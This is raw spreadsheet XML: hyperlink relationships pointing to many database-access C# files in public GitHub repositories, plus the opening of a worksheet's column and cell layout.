Target="https://github.com/rlfqudxo/playscript-mono/raw/4cba1782f6b5d1bcb0b4d435cc8ae9e0a1fc887d/mcs/class/System.Data/System.Data.SqlClient/SqlCommandBuilder.cs" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/seaque/LibraryManagement/raw/90d36ddce71b7f607e71d8ac02f31021f607eddd/DAL/Book_DAL.cs" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/blackkingtht/war/raw/b6767d94f756568ebe9ea6dd56e08b778c57c9b4/War/server/server/DBModel/AbstractSQLDBModel.cs" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/liankong110/VAN_OA/raw/53b27cc0aa13b99dc16390b6ded2d24f91ed4050/FLY/Dal/JXC/CAI_OrderOutHousesService.cs" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PanzerFaustNL/playscript-mono/raw/bdd54caeb7377f946dea47746e263bb7a538b9f3/mcs/class/System.Data/System.Data.Common/DbCommandBuilder.cs" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/blacklensama/1709/raw/4b471d3ecc7faad8d5b17b715dddc393083c5955/2013-04-01/csExWB/csExWB/DataBase.cs" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zoomla/CMS-Source-code/raw/058828244ff1753f5a74a81432e41ce53234cd63/Zoomla%E9%80%90%E6%B5%AACMS2_x3.9%E6%BA%90%E7%A0%81-mvc/ZoomLa.BLL/Other/B_GradeOption.cs" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arqum123/_HRM/raw/afc0b3eb5683137a6b6fa716f66e09e2c2e0568b/HRM.Repository/UserTypeRepository.base.cs" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tracyacai/sharpmap/raw/751bb02054c3e4d945a6d24dad025dcd9ca7a1e4/SharpMap/Data/Providers/MsSql.cs" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ramyothman/RBM/raw/776dec4975bdb24f3e6029e161f12536dff0a218/Jareeda/DataAccessLayer/DataAccessComponents/Conference/InvitedGuestsDAC.cs" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hippietrail/hsb0307/raw/4c80764e118f61adc18466103d0dab25a141bf8e/projects/Foosun/Foosun.SQLServerDAL/Search.cs" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mygithub6/CMS/raw/48685b3ed7f3ed4f40d1081f0bc937a4e3b2338f/src/Orchard/Data/Migration/Interpreters/MySqlCommandInterpreter.cs" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Tharnid/Chazwa/raw/f9eb72c9a86506364a0467d8f7674a4a0614617d/BootstrapEx/SamplesData/ProductClasses/ProductManager.cs" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/krishnaMoulicgs/Sewbie_BugFixing/raw/1b629f15b9520318162f1b977c451a10e20a5aa3/Libraries/Nop.BusinessLogic/ExportImport/ExcelHelper.cs"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github.com/jorik041/osmsharp/raw/cb30ff535717fce3fef5d7f19d0e36a24137d8bc/Data/Oracle/OsmSharp.Osm.Data.Oracle/SimpleSchema/Processor/ChangeSets/OracleSimpleChangeSetApplyTarget.cs" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Tom-PIT/Connected/raw/a677368cae826fcc5936031cddc18dae4beeaae0/DataProviders/TomPIT.DataProviders.Sql/Design/Browser.cs" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ramyothman/Qiyas/raw/f0f4bcaed99f275f80040f266c2f9236fe6d8e62/Source/EventoNew/DataAccessLayer/DataAccessComponents/Conference/EmailTemplateDAC.cs" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sharifqasrawi/SIF-IT-Dept-app/raw/ca5378e51eca0bda8e69cf3d3138bf947a58c8a2/PL/frmPayDocs.cs" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/TobiasTao/windows-homework/raw/487ed6805e4aa1047632f130aca3238de4322d24/WPFTest/Utils/SqliteHelper.cs" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/renfushuai/AutoDapper/raw/520fff476ccc6fbff831a97df19127bd0eb2b8d3/XDF.Core/Helper/Db/MySqlDapperHelper.cs" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Isidorito/testNET/raw/9c26e9f9b4097c569b79825a84327ec568f0af09/snippets/csharp/VS_Snippets_ADO.NET/DataWorks%20SqlBulkCopy.ConnectionString/CS/source.cs" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ferhat0935/Csharp-ile-Proje-Yonetimi-Otomasyonu/raw/eabc18297bde960a89639a19266d44462bf79119/LisansTezi.v5/LisansTezi/%C4%B0spaketi.cs" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ColinLoveLucky/NetFrameworkDemo/raw/3fea018516df499696b04c062450cac7e3d71686/xianggangqapp/QK.APP.Entity/ExtendEntity/BasicEntity.cs" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vikiii22/DesarrolloInterfaces/raw/95dd0bc80338b17bb4a1885c2fe2bbb9e3ba7f9f/WPF/EjerciciosWPF/proyectoFinal/proyectoFinal/proyectoFinal/winLibroLibreria.xaml.cs" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/yiershan/DonetSpider/raw/436eb3e23b871ffb09f6d6c36f722e87b3cbfdd3/src/SqliteWriter/SqliteWriter.cs" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cdc-dpbrown/EpiInfoVHF/raw/a0dae03300ff9bbfa4aeb85062b3f7ad8983c6b2/ContactTracing.ImportExport/XmlDataImporter.cs" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jvtipaymerantes/Coffee/raw/32f5e2a528f80f1a8dc837faa6b53f4fbbd7722b/coposProject/Forms/salesForm.cs" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/qq5013/HNXC/raw/7bcfad95eae1bb87e60c62a54652f1943d84caef/WMS/THOK.Wms.Upload/Dao/UploadDao.cs" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sessionliang/os/raw/cf8fa4ea87c5bd23f5eb25ed3600ce63168af29e/ss/PMS/SiteServer.Project/Provider/Data/SqlServer/Local/PMS/ApplyDAO.cs" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Sarah079/DB_all_connection_ways/raw/38edeb982befe87842f5c0e20b6995ac107c43ff/CUD272ClassTutorial/OurServices/data/PersistentDataService.cs" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/krishnaMoulicgs/Sewbie_BugFixing/raw/1b629f15b9520318162f1b977c451a10e20a5aa3/Libraries/Nop.BusinessLogic/ExportImport/ExcelHelper.cs" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MmejiaLopez/Prototipo2P/raw/64d06f7e1530f4fcf96b914a677c08ce1f3c0971/Programas/Navegador/Modelo/Sentencias.cs" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kartyeks/Billing/raw/66a4e770ca3df5bd75e1669b83b596f35d627106/HRManager/ExtendedBusinessObjects/Recruitment/Master_CandidateBusinessObject.cs" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joethinh/nohros-must/raw/8d96144c969ff8f59d4f7c20eda1b4fc3fb1b22b/src/impl/providers/sqlce/queries/AddStateQuery.cs" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joeywda/Srvtools/raw/e1e7fb954894d78772bfb4aa1aec53d51a3b0aba/LogSQLBuilder.cs" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SoftSuite/SHND/raw/9811de3acd382d2e9c9981cc0587c174fa56658f/DAL/Views/VMaterialNutrientDAL.cs" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/printf-dj/Alpha/raw/78f4305a06177b23a87f3f5082437cf0ca8bcc69/Alpha%20Rebranded/s_librarycheck.aspx.cs" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/yunxiaokeji/ErDangJia/raw/0c7f968b574da46557df0ae1ebc6d75794b2564b/CloudSalesDAL/Common/CommonDAL.cs" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vanjavii/HighschoolGradebook/raw/0973007ca8c4d9bd8614d6fac740811e7f455b62/Repository/DatabaseRepository/GenericDbRepository.cs" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/reagtor/TradeMatchSettlementManagment/raw/71845e4141173762bf0b15e60ffa609a7bb56d3a/GTA.VTS.ManagementCenter/ManagementCenter.DAL/CommonTable/CM_NotTradeDateDAL.cs" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PhanDungTri/ComputerWebShop/raw/f993aae83b35a021e9f7abc66fa89eeb0f329f6c/ComputerShopApi-master/DAL/ProductDAL.cs" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/manjarb/docker-dive-into-docker-course/raw/6c6c0ff7e63bf07df584273f9b670c4b83f86ede/doc/diveintodocker/src/07-docker-compose-in-the-real-world/06-managing-microservices-with-docker-compose/worker/src/Worker/Program.cs" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/398786172/GIT/raw/f32453a546d819f0e5e438d58f77facfd41dbb7f/OCV0625/DBUtility/SQLServerHelp.cs" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/KristhelBrigitte/Biblio/raw/adb95e8dcd155311af5a0470fc1fbf502b8bee01/AccesoDatos/ADEditorial.cs" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Kesco-m/Kesco.Lib.Entities/raw/8d896fba88be433e31554ec6183b72349ad128da/Corporate/Net/Net.cs" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mfagadi/openvss/raw/3b5a44a6ebe5450835016a141c5a7dcf027f53c4/VsSrc/VsUtils/MySQL/mysql-connector-net-5.2.3-src/MySql.Data/Tests/Source/Syntax.cs" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/securitylong100/LONG_FW/raw/f686809a9bdc625cc5e9dec4a1021ef265d82015/NidecMES/GlobalMasterMaintenance/Dao/GroupMachine/UpdateGroupMachineDao.cs" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/trentinodigitale/GVC/raw/b2fb0dd6863c3827aa782577742851988e932b69/Repository/rtier/Service/GVCTLOG_SEGNALAZIONICollection.generated.cs" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ChrisZhou0405/OneLinkWalk/raw/16b94a5d9d6b7141bfb5ec3f363afde109b49723/Backup/KINGTOP.WEB/SysAdmin/Model/ModelAjaxDeal.asmx.cs" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mwilian/demos/raw/3ea0318dedb13536024314207812ee1b4e900f34/DAO/POGDataAccess.cs" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/blackkingtht/war/raw/b6767d94f756568ebe9ea6dd56e08b778c57c9b4/War/server/server/DBModel/AbstractSQLDBModel.cs" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brendachongg/ACI/raw/d26a77c53fd50f2b3888e78bec7091d141a7ad6f/ACITMS/ACI_TMS/App_Data/Data/DB_Batch_Session.cs" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/AshidaFaisal/qbiztro_restaurant/raw/cf4cd7c84e2d51dbc33377e603fd71e04fac7e38/INDIAN/Code/BisCarePosEdition/MyClass.cs" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dimitarminchev/ITCareer/raw/8c643c1d4fe5431b778027c8f3fa9a50872f2778/07.%20Software%20Development/2020/7.%20Databases/MiniORM/DatabaseConnection.cs" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zombekast/basi_dannih/raw/1fa53abfa4bd1b5a018320be7f58b3e3fd2700d3/%D0%9B%D0%B0%D0%B1%D0%B0%201%20%D0%B1%D0%B4/%D0%9B%D0%B0%D0%B1%D0%B0%201%20%D0%B1%D0%B4/Form1.cs" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/onuruulusoy/WebApplication1/raw/6276284502b92bf3ec1c86503f3415e64681b644/WebApplication1/UrunDetay.aspx.cs" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/blacklensama/1709/raw/4b471d3ecc7faad8d5b17b715dddc393083c5955/2013-04-01/csExWB/csExWB/DataBase.cs" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/antgraf/Embedded-DB-.Net-Performance-Test/raw/63957da3de03b859f298dd3a7d15559532e3cd2f/EmbeddedDbDotNetTest/EmbeddedDbDotNetTest/SqlLiteNet/SQLite.cs" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/faester/aomlinq/raw/0cc6a822730484e14dff1cb4cf90ab2b230b1b2f/GenDB/PerformanceTests/ExcelWriter.cs" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/engeyads/ESCARE/raw/aec95a8396f2a8da8e0e5ae166798937c7604222/Resiept.aspx.cs" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Pawel-dtas/Wealthy-RPT/raw/2673c7c49506a1f07923bc162cd4a061f21cb703/Wealthy%20RPT/PeriodImport.xaml.cs" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shrikant-takale/ComputerCare/raw/ec37c36eb6c7d6dc7e37e0ce0248e5797d251479/ComputerCare/Operations/FrmGroupSMS.cs" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Devaniti/Semester5Labs/raw/32c4f13093cef298c27ea535afac75dad7461b2e/DB2/LR2/DBLab2/OSLab2/MainWindow.xaml.cs" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/pivotTable" Target="../pivotTables/pivotTable2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ramyothman/RBM/raw/776dec4975bdb24f3e6029e161f12536dff0a218/Jareeda/DataAccessLayer/DataAccessComponents/Conference/InvitedGuestsDAC.cs" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NishiokaTakeo/spider-spiderdocs/raw/77485a3e240981b502913775768d875f2c2bb76a/WebSpiderDocs/Helpers/Customs/DaoBase.cs" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Tharnid/Chazwa/raw/f9eb72c9a86506364a0467d8f7674a4a0614617d/BootstrapEx/SamplesData/ProductClasses/ProductManager.cs" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/TheBigBang2/GroupProject223/raw/d8b98322dc35a1da43ff7ae7244064451cfed4db/GroupProject223/MaintainBooking.cs" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/annytab/a-webshop/raw/e238ff6b04a66799a16baa03635c1ea570889046/Webshop/Models/Unit.cs" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/williamchang/creativecrew-web-aspnet-foundation_aspnet_webforms/raw/64336ce8d50939036febe74602b604a68c960467/App_Code/DatabaseCommon.cs" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/josueVegaR/Matricula-2021---Web/raw/1c734528119df738ea5b68d8c85ecd4427407662/AccesoDatos/ADHorarios.cs" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jrafael05/SISTEMA-DE-VENTAS/raw/39a9557715ee8aa33fc690d13e49af4fd2815941/DATOS/MovimientoDAL.cs" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sajjucode/programmermate/raw/668733b2b3e9cb3164674c86d18ccdffc5fb6563/Pss.ProgrammerMate.DAL/ProjectMethodsDAL.cs" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/130641641/Sql-Server-Sample/raw/d34e1ab5f404bb5b660282e15ecb32033903c3dc/sample/DataAccessLayer/DataBase.cs" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sofyanard/bankpapua-sme/raw/cd097db5eca9e85a9b43d667b02a26033f2b8973/Facilities/AssignBulkCO.aspx.cs" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/wojilu/wojilu/raw/83a2f1c850ec49cee0f40cf8fa71bcd2d8e92313/wojilu/ORM/Operation/UpdateOperation.cs" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sumitvatsal/ERPMarch2022/raw/23371a592fc28a5dd0a365e3e421193fe0a29b6a/schoolERP_BLL/sqlHelper.cs" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DirectumCompany/IsblCheck/raw/049e3246e437af4c6f55add0d1d8decba6abe30d/src/IsblCheck.Context.Development/Database/Handlers/ScriptDatabaseHandler.cs" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/smart1125/LandBankPushManagement/raw/c3a35bc44923e6739b22a577ae930b05cdbe5830/PushManagement/PushWhitelist.aspx.cs" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/KenAdeniji/WordEngineering/raw/9ce2e29fdaf49154f9416ead251b90d845ef2c6f/IIS/WordEngineering/Bing/Map/BingMapCenterPointLatitudeLongitude.aspx.cs" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/omerfekrem/MOAgrossStok/raw/40b148bba63a22017798523d8b1b99032e2c2213/MOAgrossStok/ciroRaporlama.cs" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/matthieu-dubois/MDU_ReaderNFC/raw/bebe93de751f06f8742e55465a06bcdb1777d32b/WindowsFormsApp1/Form1.cs" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Marouen-Mahou/INSAT-GL3-.NET-DataBases-TP2/raw/43fe0d0610dbdffbdc621ba1439b6170bc284d85/ADO.NET%20Connect%C3%A9/Program.cs" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mharisbaig/Global_Cable_Network/raw/93e88e876d2418de7d1c7844586347439889091b/frmLineMan.cs" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/iEricZHENG/KiwiCrawler.CASM/raw/6729717bc943b4f23a2be1fad44e85946aef5644/DBUtility/DbHelperOra.cs" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/yidane/51wine/raw/06406affdbcc489b49d412c1ef7a3423007d2564/WeiXinPF.DAL/ucard/wx_ucard_ticket.cs" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/liankong110/VAN_OA/raw/53b27cc0aa13b99dc16390b6ded2d24f91ed4050/FLY/Dal/JXC/CAI_OrderOutHousesService.cs" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lucaSchiavon/Re2017MVCSoftware/raw/1606608a3edd4782f9a68e41326550e5a1c9dc85/Prj.Api/ItryRepository/BaseRepository.cs" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/attamunim/HotelManagement/raw/7c4b903f85b9d4c4e10678208a4c0bcc569442ce/HotelManagement/Login.cs" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CameronOlson/Blogger/raw/7d6a010f21a2d90c8bc72c1cbf513c81fa508dcb/Repositories/BlogsRepository.cs" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/seaque/LibraryManagement/raw/90d36ddce71b7f607e71d8ac02f31021f607eddd/DAL/Book_DAL.cs" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/roryArchive/CaptivePortal.POC/raw/022eb4536b924e1b2c6d6b90979597d41abb3fa8/CaptivePortal.DataAccessModule/RegisterDB.cs" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/numandokrul/e-Commerce-NumanStore/raw/3088e6a8f504e1348171f2f0b0120f7cd6af3545/e-Commerce-NumanStore.eCommerce/App_Code/UrunCRUD.cs" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arqum123/_HRM/raw/afc0b3eb5683137a6b6fa716f66e09e2c2e0568b/HRM.Repository/UserTypeRepository.base.cs" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zoomla/CMS-Source-code/raw/058828244ff1753f5a74a81432e41ce53234cd63/Zoomla%E9%80%90%E6%B5%AACMS2_x3.9%E6%BA%90%E7%A0%81-mvc/ZoomLa.BLL/Other/B_GradeOption.cs" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sertugkaptan/DB/raw/4a7b40189b4e3aa9252705a0d00fddc6eb42af7e/Database/AddStudentScreen.cs" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/felwanew/AisBuchung/raw/a782dba22ab322b527ff2c59a19c640c10cd84c6/AisBuchung_Api/Models/DatabaseManager.cs" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/minaik-com-tw/EIP/raw/71680e997393ef3dc7ff0a0c61dd888eb4d27827/Security/UserCompanyS.aspx.cs" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DESUP2/Telecommunication-Management/raw/02a06f71ea6bec0a677961faf2378bf855ea63b4/Management%20Systems/Telecommunication%20Management%20System/Staff.cs" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Essort/openvss/raw/e0af68f101be26a7c9a677d34ab2273d5eaf1b6a/VsSrc/VsUtils/MySQL/mysql-connector-net-5.2.3-src/MySql.Data/Tests/Source/DataAdapterTests.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95"/>
  <sheetViews>
    <sheetView topLeftCell="A43" workbookViewId="0">
      <selection activeCell="B55" sqref="B55"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15"/>
  <cols>
    <col min="2" max="2" width="36" customWidth="1"/>
    <col min="3" max="3" width="19" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="19.85546875" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="8.140625" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="17.140625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="11.7109375" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="14.5703125" customWidth="1"/>
    <col min="10" max="10" width="17.28515625" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="19.85546875" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="19" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="22.5703125" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="25.140625" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="20.42578125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10">
      <c r="A1" s="5" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="5" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="5" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="5" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="5" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="5" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="5" t="s">
        <v>7</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>8</v>
      </c>
      <c r="J1" s="5" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:10">
      <c r="A2" s="1"/>
      <c r="B2" s="1" t="s">
        <v>10</v>
      </c>
      <c r="C2" s="3" t="s">
        <v>11</v>
